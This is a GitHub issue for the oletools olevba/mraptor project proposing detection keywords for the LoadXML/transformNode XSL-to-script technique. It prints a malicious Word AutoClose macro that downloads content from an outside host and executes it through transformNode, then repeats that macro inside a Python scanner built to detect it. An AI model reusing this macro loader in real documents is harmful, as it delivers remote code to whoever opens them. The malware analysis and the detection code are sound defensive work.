
olevba, mraptor: add keywords LoadXML/transformNode for XSL to script

Open • decalage2 opened this issue 1 year ago • 1 comment

Several recent samples use the LoadXML and transformNode methods (on an MSXML2.DomDocument COM object) to apply an XSL stylesheet to XML data and obtain malicious JavaScript, which seems to be executed automatically:

  • https://twitter.com/DmitriyMelikov/status/1772661332904468851
  • https://twitter.com/doc_guard/status/1772602672702497039

transformNode: https://learn.microsoft.com/en-us/previous-versions/windows/desktop/ms761399(v=vs.85)

more info:

  • https://twitter.com/blu3_team/status/1046066227926499328
  • https://twitter.com/domchell/status/1038173734732029952
  • https://twitter.com/EmericNasi/status/1254478745634770945
  • https://twitter.com/bohops/status/1254559511148474369

$ olevba bbdbcec62526b94b38d7ab4e0e794efcc363cd7ec033f39c543c666378c317ea.doc 
olevba 0.60.1 on Python 3.11.6 - http://decalage.info/python/oletools
===============================================================================
FILE: bbdbcec62526b94b38d7ab4e0e794efcc363cd7ec033f39c543c666378c317ea.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls 
in file: bbdbcec62526b94b38d7ab4e0e794efcc363cd7ec033f39c543c666378c317ea.doc - OLE stream: 'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Module1.bas 
in file: bbdbcec62526b94b38d7ab4e0e794efcc363cd7ec033f39c543c666378c317ea.doc - OLE stream: 'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Sub AUtoclose()
Set Document = CreateObject("MSXML2.DomDocument")
Set dOcuMeNtXMl = CreateObject("MSXML2.xmlhttp")
Document.async = 0
With dOcuMeNtXMl
.Open "get", "https://adfhjiuyqnmahdfiuad.com/index.php", False
.senD
End With
Document.LoadXML dOcuMeNtXMl.responseText
Document.tRAnsformnode Document
End Sub
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |AUtoclose           |Runs when the Word document is closed        |
|Suspicious|Open                |May open a file                              |
|Suspicious|CreateObject        |May create an OLE object                     |
|Suspicious|MSXML2.xmlhttp      |May download files from the Internet         |
|IOC       |https://adfhjiuyqnma|URL                                          |
|          |hdfiuad.com/index.ph|                                             |
|          |p                   |                                             |
+----------+--------------------+---------------------------------------------+

decalage2 • Mar 27 '24 11:03
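As an added example (this is not oletools code and not the issue author's), the following Python scanner implements the keyword rule proposed in the issue: it matches LoadXML and transformNode case-insensitively, the way olevba's keyword table treats VBA, reproduces the kinds of hits olevba reported for the sample, and adds a combined "XSL to script" check plus a simplified mraptor-style AutoExec + Execute verdict. The macro text is the one quoted in the olevba output above, embedded inline so the script runs offline; the regexes, the descriptions for the two new keywords, the second (benign) macro, and the simplified mraptor logic are assumptions made for this example, not oletools' actual rule tables.

```python
"""Added example, not oletools code: a small keyword scanner in the spirit of
olevba/mraptor that implements the rule proposed in this issue, flagging the
LoadXML + transformNode pair as "XSL to script".  Regexes, the descriptions of
the two new keywords and the mraptor-style verdict are assumptions."""
import re
from collections import namedtuple

Rule = namedtuple("Rule", "kind keyword pattern description")
Match = namedtuple("Match", "kind keyword description")

# VBA is case-insensitive and the sample obfuscates casing (AUtoclose,
# tRAnsformnode, senD), so every pattern is searched with re.IGNORECASE.
RULES = [
    Rule("AutoExec", "AutoClose", r"\bSub\s+AutoClose\b",
         "Runs when the Word document is closed"),
    Rule("Suspicious", "Open", r"\bOpen\b", "May open a file"),
    Rule("Suspicious", "CreateObject", r"\bCreateObject\b",
         "May create an OLE object"),
    Rule("Suspicious", "MSXML2.xmlhttp", r"MSXML2\.(Server)?XMLHTTP\b",
         "May download files from the Internet"),
    # The two keywords the issue asks to add (descriptions are assumed wording):
    Rule("Suspicious", "LoadXML", r"\.LoadXML\b",
         "May load XML from a string (XSL to script)"),
    Rule("Suspicious", "transformNode", r"\.transformNode(Object)?\b",
         "May run script embedded in an XSL stylesheet"),
]

# Macro quoted in the issue, reproduced inline so the example runs offline.
SAMPLE_VBA = '''Sub AUtoclose()
Set Document = CreateObject("MSXML2.DomDocument")
Set dOcuMeNtXMl = CreateObject("MSXML2.xmlhttp")
Document.async = 0
With dOcuMeNtXMl
.Open "get", "https://adfhjiuyqnmahdfiuad.com/index.php", False
.senD
End With
Document.LoadXML dOcuMeNtXMl.responseText
Document.tRAnsformnode Document
End Sub
'''

# Constructed benign macro: transformNode used for reporting, LoadXML only in
# a comment, no auto-exec entry point.  It must NOT trigger the combined rule.
BENIGN_VBA = '''Sub Report()
' Document.LoadXML leftover from an old build
Set d = CreateObject("MSXML2.DOMDocument")
d.load "report.xml"
MsgBox d.transformNode(xsl)
End Sub
'''


def strip_comment(line):
    """Drop a trailing VBA comment (') unless the apostrophe is inside a
    string literal, so commented-out keywords do not produce hits."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return line


def scan_vba(source):
    """Return keyword matches in rule order, then any URLs as IOCs, mirroring
    the layout of olevba's result table."""
    code = "\n".join(strip_comment(l) for l in source.splitlines())
    found = []
    for rule in RULES:
        if re.search(rule.pattern, code, re.IGNORECASE):
            found.append(Match(rule.kind, rule.keyword, rule.description))
    for url in re.findall(r"https?://[^\s\"']+", code):
        found.append(Match("IOC", url, "URL"))
    return found


def xsl_to_script(matches):
    """Combined pattern from the issue: XML loaded from data and then
    transformed.  Requires both keywords, since transformNode on its own also
    appears in ordinary reporting code."""
    kws = {m.keyword for m in matches}
    return {"LoadXML", "transformNode"}.issubset(kws)


def mraptor_verdict(matches):
    """Simplified mraptor-style triage (assumed, not mraptor's real tables):
    AutoExec plus an Execute keyword is suspicious.  transformNode is counted
    as Execute, so the sample is flagged although it never calls Shell."""
    has_autoexec = any(m.kind == "AutoExec" for m in matches)
    has_execute = bool({m.keyword for m in matches} & {"Shell", "transformNode"})
    return has_autoexec and has_execute


def report(source):
    """Print an olevba-style summary for one VBA source text."""
    matches = scan_vba(source)
    print(f"{'Type':<10}|{'Keyword':<42}|Description")
    for m in matches:
        print(f"{m.kind:<10}|{m.keyword:<42}|{m.description}")
    print("XSL-to-script pattern:", xsl_to_script(matches))
    print("mraptor-style verdict:", "SUSPICIOUS" if mraptor_verdict(matches) else "OK")


if __name__ == "__main__":
    report(SAMPLE_VBA)
    print()
    report(BENIGN_VBA)
```

Run as a script it prints one table per macro: the issue's sample lights up both new keywords, the combined pattern and the AutoExec + Execute verdict, while the benign macro matches only CreateObject and transformNode and stays clean. The comment stripping matters in practice because copy-pasted or commented-out code is a common source of keyword false positives in bulk triage.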